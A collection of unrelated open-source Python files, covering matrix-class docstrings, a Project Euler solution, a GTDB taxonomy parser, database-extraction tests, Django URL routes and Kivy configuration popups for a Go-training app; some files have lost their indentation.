        Adds the matrix, as the left-hand operand, to another matrix or scalar.
        Adding two matrices requires both to have the same size; when adding a
        scalar to the matrix, the scalar is added to each element of the matrix.
        Args:
            other: Matrix or scalar to be added to the current object
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = a + b
#> c
3.0000 6.0000
9.0000 12.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = a + 2
#> c
3.0000 4.0000
5.0000 6.0000
"""
pass
@abstractmethod
def __rsub__(self, other):
        """Subtracts with the matrix as the right-hand operand.
        Subtracts, with the matrix as the right-hand operand, another matrix or scalar.
        Subtracting two matrices requires both to have the same size; when
        subtracting with a scalar, the operation is applied element by element.
        Args:
            other: Matrix or scalar to be subtracted with the current object
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = b - a
#> c
1.0000 2.0000
3.0000 4.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = 1 - a
#> c
            0.0000 -1.0000
            -2.0000 -3.0000
"""
pass
@abstractmethod
def __sub__(self, other):
        """Subtracts with the matrix as the left-hand operand.
        Subtracts, with the matrix as the left-hand operand, another matrix or scalar.
        Subtracting two matrices requires both to have the same size; when
        subtracting with a scalar, the operation is applied element by element.
        Args:
            other: Matrix or scalar to be subtracted with the current object
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = a - b
#> c
-1.0000 -2.0000
-3.0000 -4.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = a - 1
#> c
0.0000 1.0000
2.0000 3.0000
"""
pass
@abstractmethod
def __rmul__(self, other):
        """Element-wise multiplication with the matrix as the right-hand operand.
        Multiplies the matrix element-wise, as the right-hand operand,
        with another matrix or scalar.
        Element-wise multiplication of two matrices requires both to have the
        same size; when multiplying by a scalar, each element of the matrix is
        multiplied by the scalar.
        Args:
            other: Matrix or scalar to be multiplied with the current object
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = b * a
#> c
2.0000 8.0000
18.0000 32.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = 2 * a
#> c
2.0000 4.0000
            6.0000 8.0000
"""
pass
@abstractmethod
def __mul__(self, other):
        """Element-wise multiplication with the matrix as the left-hand operand.
        Multiplies the matrix element-wise, as the left-hand operand,
        with another matrix or scalar.
        Element-wise multiplication of two matrices requires both to have the
        same size; when multiplying by a scalar, each element of the matrix is
        multiplied by the scalar.
        Args:
            other: Matrix or scalar to be multiplied with the current object
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = a * b
#> c
2.0000 8.0000
18.0000 32.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = a * 2
#> c
2.0000 4.0000
            6.0000 8.0000
"""
pass
@abstractmethod
def __rtruediv__(self, other):
        """Element-wise division with the matrix as the right-hand operand.
        Divides element-wise, with the matrix as the right-hand operand,
        by another matrix or scalar.
        Element-wise division of two matrices requires both to have the same
        size; when dividing a scalar by the matrix, the scalar is divided by
        each element of the matrix.
        Args:
            other: Matrix or scalar to be divided with the current object
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = b / a
#> c
2.0000 2.0000
2.0000 2.0000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = 2 / a
#> c
            2.0000 1.0000
            0.6667 0.5000
"""
pass
@abstractmethod
def __truediv__(self, other):
        """Element-wise division with the matrix as the left-hand operand.
        Divides the matrix element-wise, as the left-hand operand,
        by another matrix or scalar.
        Element-wise division of two matrices requires both to have the same
        size; when dividing the matrix by a scalar, each element of the matrix
        is divided by the scalar.
        Args:
            other: Matrix or scalar to be divided with the current object
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = a / b
#> c
0.5000 0.5000
0.5000 0.5000
#> a = Matrix(2,2,[1, 2, 3, 4])
#> c = a / 2
#> c
0.5000 1.0000
1.5000 2.0000
"""
pass
@abstractmethod
def dot(self, other):
        """Performs matrix multiplication
        Matrix multiplication requires the number of columns of the first
        matrix to equal the number of rows of the second matrix.
        Args:
            other: Matrix to be multiplied with the current object
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> b = Matrix(2,2,[2, 4, 6, 8])
#> c = a.dot(b)
#> c
14.0000 20.0000
30.0000 44.0000
"""
pass
@abstractmethod
def transpose(self):
        """Transposes the matrix
        Transposing a matrix moves the element at position ij to position ji.
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,3,[1, 2, 3, 4, 5, 6])
#> a
1.0000 2.0000 3.0000
4.0000 5.0000 6.0000
#> c = a.transpose()
#> c
1.0000 4.0000
2.0000 5.0000
3.0000 6.0000
"""
pass
@abstractmethod
def gauss_jordan(self):
        """Applies the Gauss-Jordan algorithm to the matrix
        Applies the Gauss-Jordan method to the current matrix. It can be used
        to solve a system of linear equations, compute a matrix inverse, etc.
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(3,4,[1, -2, 1, 0, 0, 2, -8, 8, 5, 0, -5, 10])
#> a
1.0000 -2.0000 1.0000 0.0000
0.0000 2.0000 -8.0000 8.0000
5.0000 0.0000 -5.0000 10.0000
#> c = a.gauss_jordan()
#> c
1.0000 0.0000 0.0000 1.0000
0.0000 1.0000 0.0000 0.0000
0.0000 0.0000 1.0000 -1.0000
"""
pass
@abstractmethod
def inverse(self):
        """Computes the inverse of the current matrix
        Computes the matrix inverse using the Gauss-Jordan algorithm.
        Returns:
            Returns the matrix resulting from the operation, for example:
#> a = Matrix(2,2,[1, 2, 3, 4])
#> a
            1.0000 2.0000
            3.0000 4.0000
#> c = a.inverse()
#> c
-2.0000 1.0000
1.5000 -0.5000
"""
pass
    def _init_data(self, data):
        if data:
            if len(data) != self.rows * self.cols:
                # raise instead of printing, so callers cannot silently end up
                # with an object that has no data attribute
                raise ValueError('Init error: the data is incompatible '
                                 'with matrix size')
            self.data = data
        else:
            self.data = [0] * (self.rows * self.cols)
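A concrete subclass would typically keep the values row-major in `self.data`; a standalone sketch of the 1-based (i, j) → offset mapping that `__getitem__`/`__setitem__` describe (the `offset` helper is hypothetical, not part of this module):

```python
def offset(i, j, cols):
    """Map a 1-based (i, j) position to a row-major list index."""
    return (i - 1) * cols + (j - 1)

data = [1, 2, 3, 4]  # a 2x2 matrix stored row-major
print(data[offset(2, 1, 2)])  # → 3
```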
# File: P0003.py
# Repo: sebastianaldi17/ProjectEuler (MIT license)
# Largest prime factor
# https://projecteuler.net/problem=3
# Sieve of Eratosthenes approach
# But still slow due to iteration to sqrt(n)
from math import sqrt
question = 600851475143
def solve(n):
    ans = 1
    limit = int(sqrt(n))
    prime = [True for i in range(limit+1)]
    p = 2
    while p <= limit:
        if prime[p]:
            for i in range(p*2, limit+1, p):
                prime[i] = False
        p += 1
    # divide out each small prime completely; anything left over is a
    # single prime factor larger than sqrt(n)
    remainder = n
    for i in range(2, limit+1):
        if prime[i]:
            while remainder % i == 0:
                ans = i
                remainder //= i
    if remainder > 1:
        ans = remainder
    return ans
print(solve(question))
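For comparison, plain trial division with repeated factor removal needs no sieve and also covers a prime factor above sqrt(n) (a sketch; `largest_prime_factor` is a hypothetical helper, not part of the script):

```python
def largest_prime_factor(n):
    """Divide out each factor completely; what remains at the end is the largest prime factor."""
    factor = 2
    while factor * factor <= n:
        if n % factor == 0:
            n //= factor
        else:
            factor += 1
    return n

print(largest_prime_factor(13195))  # → 29, the worked example from the problem statement
```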
# File: data_structures/binary_heap_operations.py
# Repo: johnnydevriese/python_fun (MIT license)
from pythonds.trees.binheap import BinHeap
# pythonds so we need to use python2.7 to run
bh = BinHeap()
bh.insert(5)
bh.insert(7)
bh.insert(3)
bh.insert(11)
print(bh.delMin())
print(bh.delMin())
print(bh.delMin())
print(bh.delMin())
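The standard library's heapq module offers the same min-heap behaviour without the pythonds dependency; a sketch:

```python
import heapq

heap = []
for value in (5, 7, 3, 11):
    heapq.heappush(heap, value)

# heappop always returns the current minimum, mirroring BinHeap.delMin()
popped = [heapq.heappop(heap) for _ in range(4)]
print(popped)  # → [3, 5, 7, 11]
```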
# File: test/unit/extractor/test_sticky_relations.py
# Repo: willangenent/abridger (MIT license)
import pytest
from abridger.extraction_model import Relation
from abridger.schema import SqliteSchema
from test.unit.extractor.base import TestExtractorBase
class TestExtractorStickyRelations(TestExtractorBase):
@pytest.fixture()
def schema_out(self):
'''
test1 -> sticky -> test3 <- test2
-> non_sticky -> test3 <- test2
'''
for stmt in [
'''
CREATE TABLE non_sticky (
id INTEGER PRIMARY KEY,
test3_id INTEGER REFERENCES test3
);
''', '''
CREATE TABLE sticky (
id INTEGER PRIMARY KEY,
test3_id INTEGER REFERENCES test3
);
''', '''
CREATE TABLE test1 (
id INTEGER PRIMARY KEY,
sticky INTEGER REFERENCES sticky,
non_sticky INTEGER REFERENCES non_sticky
);
''', '''
CREATE TABLE test2 (
id INTEGER PRIMARY KEY,
test3_id INTEGER REFERENCES test3
);
''', '''
CREATE TABLE test3 (
id INTEGER PRIMARY KEY
);
''',
]:
self.database.execute(stmt)
return SqliteSchema.create_from_conn(self.database.connection)
@pytest.fixture()
def data_out(self, schema_out):
non_sticky = schema_out.tables[0]
sticky = schema_out.tables[1]
table1 = schema_out.tables[2]
table2 = schema_out.tables[3]
table3 = schema_out.tables[4]
rows = [
(table3, (1,)),
(table3, (2,)),
(table2, (1, 1)),
(table2, (2, 2)),
(sticky, (1, 1)),
(non_sticky, (1, 2)),
(table1, (1, 1, None)),
(table1, (2, None, 1)),
]
self.database.insert_rows(rows)
self.data_everything_except_table2 = (
rows[0:2] + # table 3
rows[4:6] + # sticky and non_sticky
rows[6:8] # table 1
)
self.data_everything_except_table2_non_sticky_row = (
rows[0:2] + # table 3
rows[4:6] + # sticky and non_sticky
rows[6:8] + # table 1
rows[2:3] # table 2, row 1
)
return rows
def test1(self, schema_out, data_out):
# Check fetch without any relations, which won't grab any rows in
# table 2
table = {'table': 'test1'}
self.check_one_subject(schema_out, [table],
self.data_everything_except_table2)
def test2(self, schema_out, data_out):
# Check fetch without sticky relations, which grabs everything
table = {'table': 'test1'}
relation = {'table': 'test2', 'column': 'test3_id'}
self.check_one_subject(schema_out, [table], data_out,
relations=[relation])
def test3(self, schema_out, data_out):
# Check fetch without sticky relations, but flag test2 as sticky
# this should not fetch anything in test2 since there is no sticky
# trail
table = {'table': 'test1'}
def outgoing_sticky_rel(table, col):
return {'table': table, 'column': col, 'sticky': True,
'type': Relation.TYPE_OUTGOING}
relations = [
outgoing_sticky_rel('test1', 'sticky'),
outgoing_sticky_rel('sticky', 'test3_id'),
outgoing_sticky_rel('test2', 'test3_id'),
{'table': 'test2', 'column': 'test3_id', 'sticky': True},
]
self.check_one_subject(
schema_out, [table],
self.data_everything_except_table2_non_sticky_row,
relations=relations)
# File: edl/gtdb.py
# Repo: jmeppley/py-metagenomics (MIT license)
"""
Tools for parsing GTDB headers into a taxonomy model
"""
import os
import re
import sys
import logging
from edl.taxon import TaxNode, Taxonomy
from edl.silva import writeDumpFiles
from edl.util import treeGenerator
logger = logging.getLogger(__name__)
GTDB = 'gtdb'
GTDBTAB = 'gtdb_table'
PHYLODB = 'phylodb'
def generate_taxdump(fasta=None, table=None, dump=".", **kwargs):
""" convert a GTDB faa file to ncbi style taxdumps """
if fasta is not None:
tax_file = fasta
fmt = 'fasta'
elif table is not None:
tax_file = table
fmt = 'table'
else:
raise Exception("Please supply 'fasta' or 'table' file")
tax_args = {k: v for k, v in kwargs.items() if k in ['style']}
taxonomy = parse_lineages(tax_file, fmt, **tax_args)
dump_args = {k: v for k, v in kwargs.items() if k in ['map_file_name']}
dump_taxonomy(taxonomy, dump, **dump_args)
def generate_gtdb_lineages_from_table(tax_file):
""" return acc,lineage tuple from file """
with open(tax_file) as table_h:
# skip header
try:
next(table_h)
except StopIteration:
raise Exception("Table is empty!\n" + tax_file)
for line in table_h:
org, _species, lineage = \
[x.strip()
for x in line.split('\t', 4)[:3]]
yield (org, lineage)
def generate_gtdb_lineages(fasta_file):
""" return acc,lineage tuple from file """
with open(fasta_file) as fasta_h:
for line in fasta_h:
if line.startswith(">"):
# in GTDB headers, lineage is second chunk
acc, lineage = line[1:].split(None, 2)[:2]
yield (acc, lineage)
def generate_phylodb_lineages(fasta_file):
""" return acc,lineage tuple from file """
with open(fasta_file) as fasta_h:
for line in fasta_h:
if line.startswith(">"):
# in GTDB headers, lineage is second chunk
acc, lineage = line[1:].split("\t", 2)[:2]
yield (acc, lineage)
def parse_lineages(tax_file, fmt='fasta', style=GTDB):
""" returns taxonomy object """
id_map = {}
root = TaxNode('root', None, None)
tree = {'root': root}
logger.debug("Parsing %s", tax_file)
if style == GTDB:
add_lineage_to_tree = add_gtdb_lineage_to_tree
generate_lineages = generate_gtdb_lineages
else:
add_lineage_to_tree = add_phylodb_lineage_to_tree
generate_lineages = generate_phylodb_lineages
# generate taxonomy tree
for acc, lineage in generate_lineages(tax_file):
# create TaxNode
node = add_lineage_to_tree(lineage, tree)
id_map[acc] = node
logger.debug("Adding id numbers to %d nodes", len(tree))
# assign numeric IDs
i = 0
for node in treeGenerator(root):
i += 1
node.id = i
logger.debug("Added %d id numbers", i)
return Taxonomy(id_map, None, None, tax_file, root)
RANK_LIST = ['domain', 'phylum', 'class',
'order', 'family', 'genus', 'species']
def add_phylodb_lineage_to_tree(lineage, tree):
""" parse given lineage
create new TaxNode objects as needed
assumes that there are 7 elements in lineage, one for each rank
return leaf node """
last_node = tree['root']
sub_lineage = []
if lineage.startswith('Euk'):
        # There is an extra entry in the PhyloDB Euk lineages
ranks = [RANK_LIST[0], None] + RANK_LIST[1:]
else:
ranks = RANK_LIST
for rank, taxon_string in zip(ranks, lineage.split(';')):
sub_lineage.append(taxon_string)
taxon = ';'.join(sub_lineage)
try:
last_node = tree[taxon]
except KeyError:
new_node = TaxNode(taxon, last_node.id, rank)
new_node.name = taxon_string
new_node.setParent(last_node)
tree[taxon] = new_node
last_node = new_node
return last_node
RANK_DICT = {'d': 'domain', 'p': 'phylum', 'c': 'class',
'o': 'order', 'f': 'family', 'g': 'genus', 's': 'species'}
def add_gtdb_lineage_to_tree(lineage, tree):
""" parse given lineage
create new TaxNode objects as needed
    assumes lineage names start with x__ where x is a rank abbreviation
return leaf node """
last_node = tree['root']
sub_lineage = []
for taxon_string in lineage.split(';'):
rank_char, taxon_name = taxon_string.split('__')
rank_char = re.sub(r'^_', '', rank_char)
sub_lineage.append(taxon_string)
taxon = ';'.join(sub_lineage)
try:
last_node = tree[taxon]
except KeyError:
            try:
                rank = RANK_DICT[rank_char]
            except KeyError:
                raise ValueError("unknown rank abbreviation %r in lineage %r"
                                 % (rank_char, lineage))
new_node = TaxNode(taxon, last_node.id, rank)
new_node.name = taxon_name
new_node.setParent(last_node)
tree[taxon] = new_node
last_node = new_node
return last_node
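The `x__` prefix convention and the cumulative semicolon-joined keys used above (which keep identically named taxa on different branches distinct) can be sketched in isolation; `lineage_keys` is a hypothetical helper and the sample lineage is illustrative, not taken from real data:

```python
RANK_DICT = {'d': 'domain', 'p': 'phylum', 'c': 'class',
             'o': 'order', 'f': 'family', 'g': 'genus', 's': 'species'}

def lineage_keys(lineage):
    """Yield (cumulative_key, rank, name) for each level of a lineage."""
    sub_lineage = []
    for taxon_string in lineage.split(';'):
        rank_char, taxon_name = taxon_string.split('__')
        sub_lineage.append(taxon_string)
        # the key is the full prefix, so e.g. the same genus name under two
        # different families produces two distinct tree entries
        yield ';'.join(sub_lineage), RANK_DICT[rank_char], taxon_name

for key, rank, name in lineage_keys('d__Bacteria;p__Proteobacteria'):
    print(rank, name)
# domain Bacteria
# phylum Proteobacteria
```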
def dump_taxonomy(taxonomy, dump_path, map_file_name='gtdb.acc.to.taxid'):
""" generate nodes.dmp and names.dmp """
# Write dump files
if not os.path.exists(dump_path):
os.makedirs(dump_path)
with open(os.path.sep.join((dump_path, 'nodes.dmp')), 'w') as nodes_h:
with open(os.path.sep.join((dump_path, 'names.dmp')), 'w') as names_h:
writeDumpFiles(taxonomy.root, nodes_h, names_h)
# Write hit->tax mapping file
if map_file_name is None:
return
with open(os.path.sep.join((dump_path, map_file_name)),
'w') as acc_map_h:
for (hitid, tax_node) in taxonomy.idMap.items():
acc_map_h.write("%s\t%d\n" % (hitid, tax_node.id))
if __name__ == '__main__':
""" convert a GTDB faa file to ncbi style taxdumps
kw arguments to generate_taxdump passed as args like:
python edl/grdb.py fasta=/path/to/x.faa dump=/path/to/dump
for reference:
generate_taxdump(fasta=None, table=None, dump="."):
"""
kwargs = dict(w.split("=", 1) for w in sys.argv[1:])
logging.basicConfig(level=logging.DEBUG)
logger.debug("args are: %r from:\n%s", kwargs, sys.argv)
# do the work:
generate_taxdump(**kwargs)
# ---- Coursera/CICCP1/dezenas.py | repo: marcelomiky/python_code | license: MIT ----
numero_inteiro = int(input("Digite um número inteiro: "))
temp = numero_inteiro // 10  # drop the units digit
digito_dezena = temp % 10  # keep the tens digit
print("O dígito das dezenas é", digito_dezena)  # "The tens digit is ..."
# ---- tests/scope.py | repo: ZYAZP/python2 (also ArrowSides/onelinerizer) | license: MIT ----
x = 2
def foo():
    x = 1  # assigns a local x; the global x is unchanged

foo()
print x  # Python 2 print statement (the repo targets Python 2); prints 2
# ---- Kalpurnia/items.py | repo: JasonAnx/Kalpurnia | license: MIT ----
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class Url(scrapy.Item):
# define the fields for your item here like:
key = scrapy.Field()
url = scrapy.Field()
class Posting(scrapy.Item):
# define the fields for your item here like:
posting = scrapy.Field()
url_id = scrapy.Field()
# ---- pyqt_helper/__init__.py | repo: morefigs/pyqt-ui-helper | license: MIT ----
from .pyqt_helper import process_file
# ---- MeetmeApp/urls.py | repo: Susan-Kathoni/Meet-Me | license: MIT ----
from django.urls import path
from . import views
from django.conf import settings
from django.conf.urls.static import static

urlpatterns = [
path('', views.home, name="home-page"),
path("home/", views.datePage, name="date-page"),
    # User URL routes
# path("register/", views.register, name="register"),
path("profile/", views.profile, name="profile-page"),
path("user/<int:pk>/", views.UserDetail.as_view(), name="user-detail"),
path("block/<int:pk>/", views.blockUser, name="block"),
    # Post URL routes
path("like/<int:pk>/", views.likePost, name="like"),
path("new-message/<str:username>",views.WriteMessage.as_view(), name="write-message"),
path("view-messages/", views.ViewMessages, name="view-messages"),
path("mark-read/<int:pk>", views.MarkAsRead, name="mark-read"),
path("delete/<int:pk>", views.DeleteMessage.as_view(), name="delete-message")
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
                          document_root=settings.MEDIA_ROOT)
# ---- gui/popups.py | repo: Kameone/katrain | license: MIT ----
from collections import defaultdict
from typing import Dict, List, DefaultDict, Tuple
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from core.common import OUTPUT_DEBUG, OUTPUT_ERROR
from core.engine import KataGoEngine
from core.game import Game, GameNode
from gui.kivyutils import (
BackgroundLabel,
LabelledCheckBox,
LabelledFloatInput,
LabelledIntInput,
LabelledObjectInputArea,
LabelledSpinner,
LabelledTextInput,
LightHelpLabel,
ScaledLightLabel,
StyledButton,
StyledSpinner,
)
class InputParseError(Exception):
pass
class QuickConfigGui(BoxLayout):
def __init__(self, katrain, popup: Popup, initial_values: Dict = None, **kwargs):
super().__init__(**kwargs)
self.katrain = katrain
self.popup = popup
self.orientation = "vertical"
if initial_values:
self.set_properties(self, initial_values)
@staticmethod
def type_to_widget_class(value):
if isinstance(value, float):
return LabelledFloatInput
elif isinstance(value, bool):
return LabelledCheckBox
elif isinstance(value, int):
return LabelledIntInput
if isinstance(value, dict):
return LabelledObjectInputArea
else:
return LabelledTextInput
def collect_properties(self, widget):
if isinstance(widget, (LabelledTextInput, LabelledSpinner, LabelledCheckBox)):
try:
ret = {widget.input_property: widget.input_value}
except Exception as e:
raise InputParseError(f"Could not parse value for {widget.input_property} ({widget.__class__}): {e}")
else:
ret = {}
for c in widget.children:
for k, v in self.collect_properties(c).items():
ret[k] = v
return ret
def set_properties(self, widget, properties):
if isinstance(widget, (LabelledTextInput, LabelledSpinner)):
key = widget.input_property
if key in properties:
widget.text = str(properties[key])
for c in widget.children:
self.set_properties(c, properties)
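`collect_properties` above walks the widget tree: leaf inputs contribute a `{property: value}` pair and containers merge their children. The same recursion can be sketched without Kivy; the `Node` class and property names below are illustrative:

```python
class Node:
    def __init__(self, children=(), prop=None, value=None):
        self.children = list(children)
        self.prop = prop
        self.value = value

def collect(node):
    # leaves contribute a single pair; containers merge their subtrees
    if node.prop is not None:
        return {node.prop: node.value}
    out = {}
    for child in node.children:
        out.update(collect(child))
    return out

tree = Node(children=[Node(prop="engine/visits", value=50),
                      Node(children=[Node(prop="debug/level", value=1)])])
print(collect(tree))  # {'engine/visits': 50, 'debug/level': 1}
```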
class LoadSGFPopup(BoxLayout):
pass
class NewGamePopup(QuickConfigGui):
def __init__(self, katrain, popup: Popup, properties: Dict, **kwargs):
properties["RU"] = KataGoEngine.get_rules(katrain.game.root)
super().__init__(katrain, popup, properties, **kwargs)
self.rules_spinner.values = list(set(self.katrain.engine.RULESETS.values()))
self.rules_spinner.text = properties["RU"]
def new_game(self):
properties = self.collect_properties(self)
self.katrain.log(f"New game settings: {properties}", OUTPUT_DEBUG)
new_root = GameNode(properties={**Game.DEFAULT_PROPERTIES, **properties})
x, y = new_root.board_size
if x > 52 or y > 52:
self.info.text = "Board size too big, should be at most 52"
return
if self.restart.active:
self.katrain.log("Restarting Engine")
self.katrain.engine.restart()
self.katrain("new-game", new_root)
self.popup.dismiss()
class ConfigPopup(QuickConfigGui):
def __init__(self, katrain, popup: Popup, config: Dict, ignore_cats: Tuple = (), **kwargs):
self.config = config
self.ignore_cats = ignore_cats
self.orientation = "vertical"
super().__init__(katrain, popup, **kwargs)
Clock.schedule_once(self.build, 0)
def build(self, _):
props_in_col = [0, 0]
cols = [BoxLayout(orientation="vertical"), BoxLayout(orientation="vertical")]
for k1, all_d in sorted(self.config.items(), key=lambda tup: -len(tup[1])): # sort to make greedy bin packing work better
if k1 in self.ignore_cats:
continue
            d = {k: v for k, v in all_d.items() if isinstance(v, (int, float, str, bool)) and not k.startswith("_")}  # no lists; dicts could be supported but are hard to scale
cat = GridLayout(cols=2, rows=len(d) + 1, size_hint=(1, len(d) + 1))
cat.add_widget(Label(text=""))
cat.add_widget(ScaledLightLabel(text=f"{k1} settings", bold=True))
for k2, v in d.items():
cat.add_widget(ScaledLightLabel(text=f"{k2}:"))
cat.add_widget(self.type_to_widget_class(v)(text=str(v), input_property=f"{k1}/{k2}"))
if props_in_col[0] <= props_in_col[1]:
cols[0].add_widget(cat)
props_in_col[0] += len(d)
else:
cols[1].add_widget(cat)
props_in_col[1] += len(d)
col_container = BoxLayout(size_hint=(1, 0.9))
col_container.add_widget(cols[0])
col_container.add_widget(cols[1])
self.add_widget(col_container)
self.info_label = Label(halign="center")
self.apply_button = StyledButton(text="Apply", on_press=lambda _: self.update_config())
self.save_button = StyledButton(text="Apply and Save", on_press=lambda _: self.update_config(save_to_file=True))
btn_container = BoxLayout(orientation="horizontal", size_hint=(1, 0.1), spacing=1, padding=1)
btn_container.add_widget(self.apply_button)
btn_container.add_widget(self.info_label)
btn_container.add_widget(self.save_button)
self.add_widget(btn_container)
def update_config(self, save_to_file=False):
        updated_cat = defaultdict(list)  # type: DefaultDict[str, List[str]]
try:
for k, v in self.collect_properties(self).items():
k1, k2 = k.split("/")
if self.config[k1][k2] != v:
self.katrain.log(f"Updating setting {k} = {v}", OUTPUT_DEBUG)
updated_cat[k1].append(k2)
self.config[k1][k2] = v
self.popup.dismiss()
except InputParseError as e:
self.info_label.text = str(e)
self.katrain.log(e, OUTPUT_ERROR)
return
if save_to_file:
self.katrain.save_config()
engine_updates = updated_cat["engine"]
if "visits" in engine_updates:
self.katrain.engine.visits = engine_updates["visits"]
if {key for key in engine_updates if key not in {"max_visits", "max_time", "enable_ownership", "wide_root_noise"}}:
self.katrain.log(f"Restarting Engine after {engine_updates} settings change")
self.info_label.text = "Restarting engine\nplease wait."
self.katrain.controls.set_status(f"Restarted Engine after {engine_updates} settings change.")
def restart_engine(_dt):
old_engine = self.katrain.engine # type: KataGoEngine
old_proc = old_engine.katago_process
if old_proc:
old_engine.shutdown(finish=True)
new_engine = KataGoEngine(self.katrain, self.config["engine"])
self.katrain.engine = new_engine
self.katrain.game.engines = {"B": new_engine, "W": new_engine}
self.katrain.game.analyze_all_nodes() # old engine was possibly broken, so make sure we redo any failures
self.katrain.update_state()
Clock.schedule_once(restart_engine, 0)
self.katrain.debug_level = self.config["debug"]["level"]
self.katrain.update_state(redraw_board=True)
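`ConfigPopup.build` above sorts setting categories largest-first and always drops the next one into the currently shorter column — a greedy two-bin packing heuristic. A Kivy-free sketch of the same idea (`pack_two_columns` is a hypothetical helper; the sizes are illustrative):

```python
def pack_two_columns(sizes):
    cols, loads = ([], []), [0, 0]
    # largest-first greedy: each item goes to the lighter column
    for size in sorted(sizes, reverse=True):
        i = 0 if loads[0] <= loads[1] else 1
        cols[i].append(size)
        loads[i] += size
    return cols, loads

print(pack_two_columns([5, 3, 2, 2]))  # (([5, 2], [3, 2]), [7, 5])
```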
class ConfigAIPopup(QuickConfigGui):
def __init__(self, katrain, popup: Popup, settings):
super().__init__(katrain, popup, settings)
self.settings = settings
Clock.schedule_once(self.build, 0)
def build(self, _):
ais = list(self.settings.keys())
top_bl = BoxLayout()
top_bl.add_widget(ScaledLightLabel(text="Select AI to configure:"))
ai_spinner = StyledSpinner(values=ais, text=ais[0])
ai_spinner.fbind("text", lambda _, text: self.build_ai_options(text))
top_bl.add_widget(ai_spinner)
self.add_widget(top_bl)
self.options_grid = GridLayout(cols=2, rows=max(len(v) for v in self.settings.values()) - 1, size_hint=(1, 7.5), spacing=1) # -1 for help in 1 col
bottom_bl = BoxLayout(spacing=2)
self.info_label = Label()
bottom_bl.add_widget(StyledButton(text=f"Apply", on_press=lambda _: self.update_config(False)))
bottom_bl.add_widget(self.info_label)
bottom_bl.add_widget(StyledButton(text=f"Apply and Save", on_press=lambda _: self.update_config(True)))
self.add_widget(self.options_grid)
self.add_widget(bottom_bl)
self.build_ai_options(ais[0])
def build_ai_options(self, mode):
mode_settings = self.settings[mode]
self.options_grid.clear_widgets()
self.options_grid.add_widget(LightHelpLabel(size_hint=(1, 4), padding=(2, 2), text=mode_settings.get("_help_left", "")))
self.options_grid.add_widget(LightHelpLabel(size_hint=(1, 4), padding=(2, 2), text=mode_settings.get("_help_right", "")))
for k, v in mode_settings.items():
if not k.startswith("_"):
self.options_grid.add_widget(ScaledLightLabel(text=f"{k}"))
self.options_grid.add_widget(ConfigPopup.type_to_widget_class(v)(text=str(v), input_property=f"{mode}/{k}"))
for _ in range(self.options_grid.rows * self.options_grid.cols - len(self.options_grid.children)):
self.options_grid.add_widget(ScaledLightLabel(text=f""))
self.set_properties(self, self.settings)
def update_config(self, save_to_file=False):
try:
for k, v in self.collect_properties(self).items():
k1, k2 = k.split("/")
if self.settings[k1][k2] != v:
self.settings[k1][k2] = v
self.katrain.log(f"Updating setting {k} = {v}", OUTPUT_DEBUG)
if save_to_file:
self.katrain.save_config()
self.popup.dismiss()
except InputParseError as e:
self.info_label.text = str(e)
self.katrain.log(e, OUTPUT_ERROR)
return
self.popup.dismiss()
class ConfigTeacherPopup(QuickConfigGui):
def __init__(self, katrain, popup, **kwargs):
self.settings = katrain.config("trainer")
self.sgf_settings = katrain.config("sgf")
self.ui_settings = katrain.config("board_ui")
super().__init__(katrain, popup, self.settings, **kwargs)
Clock.schedule_once(self.build, 0)
self.spacing = 2
def build(self, _dt):
thresholds = self.settings["eval_thresholds"]
undos = self.settings["num_undo_prompts"]
colors = self.ui_settings["eval_colors"]
thrbox = GridLayout(spacing=1, padding=2, cols=5, rows=len(thresholds) + 1)
thrbox.add_widget(ScaledLightLabel(text="Point loss greater than", bold=True))
thrbox.add_widget(ScaledLightLabel(text="Gives this many undos", bold=True))
thrbox.add_widget(ScaledLightLabel(text="Color (fixed)", bold=True))
thrbox.add_widget(ScaledLightLabel(text="Show dots", bold=True))
thrbox.add_widget(ScaledLightLabel(text="Save in SGF", bold=True))
for i, (thr, undos, color) in enumerate(zip(thresholds, undos, colors)):
thrbox.add_widget(LabelledFloatInput(text=str(thr), input_property=f"eval_thresholds::{i}"))
thrbox.add_widget(LabelledFloatInput(text=str(undos), input_property=f"num_undo_prompts::{i}"))
thrbox.add_widget(BackgroundLabel(background=color[:3]))
thrbox.add_widget(LabelledCheckBox(text=str(color[3] == 1), input_property=f"alpha::{i}"))
thrbox.add_widget(LabelledCheckBox(size_hint=(0.5, 1), text=str(self.sgf_settings["save_feedback"][i]), input_property=f"save_feedback::{i}"))
self.add_widget(thrbox)
xsettings = BoxLayout(size_hint=(1, 0.15), spacing=2)
xsettings.add_widget(ScaledLightLabel(text="Show last <n> dots"))
